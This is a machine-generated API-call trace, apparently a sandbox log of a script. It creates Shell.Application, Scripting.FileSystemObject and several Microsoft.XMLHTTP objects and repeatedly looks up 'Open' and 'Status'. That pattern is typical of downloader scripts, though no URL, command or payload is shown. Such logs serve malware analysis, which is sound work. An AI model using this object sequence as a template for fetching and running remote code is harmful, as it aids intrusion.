	[0380.573] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0380.573] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0380.573] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0380.573] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0380.573] SysStringLen (param_1=0x0) returned 0x0
	[0380.573] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0380.573] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0380.573] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0380.573] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0380.573] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0380.573] ??2@YAPEAX_K@Z () returned 0x62f350
	[0380.573] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0380.573] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0380.573] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0380.573] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0380.573] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0380.574] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0380.574] SysStringLen (param_1=0x0) returned 0x0
	[0380.574] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0380.576] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0380.576] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0380.576] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0380.576] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0380.576] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0380.576] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0381.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0381.082] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0381.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0381.083] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.083] SysStringLen (param_1=0x0) returned 0x0
	[0381.083] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.084] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0381.084] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0381.084] ??2@YAPEAX_K@Z () returned 0x62f310
	[0381.084] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0381.084] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.084] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0381.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0381.084] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0381.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.087] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.087] SysStringLen (param_1=0x0) returned 0x0
	[0381.087] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.087] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0381.087] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0381.087] ??2@YAPEAX_K@Z () returned 0x62f330
	[0381.087] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0381.087] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.087] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0381.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0381.087] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0381.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.087] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.088] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.088] SysStringLen (param_1=0x0) returned 0x0
	[0381.088] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.088] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0381.088] ??2@YAPEAX_K@Z () returned 0x62f310
	[0381.088] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.088] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.088] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.088] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.089] SysStringLen (param_1=0x0) returned 0x0
	[0381.089] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.089] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0381.089] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0381.089] ??2@YAPEAX_K@Z () returned 0x62f330
	[0381.089] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0381.089] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0381.089] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0381.089] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0381.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0381.089] longjmp () 
	[0381.089] longjmp () 
	[0381.089] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0381.089] SysStringLen (param_1=0x0) returned 0x0
	[0381.090] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0381.090] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0381.090] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0381.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0381.090] ??2@YAPEAX_K@Z () returned 0x62f310
	[0381.090] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
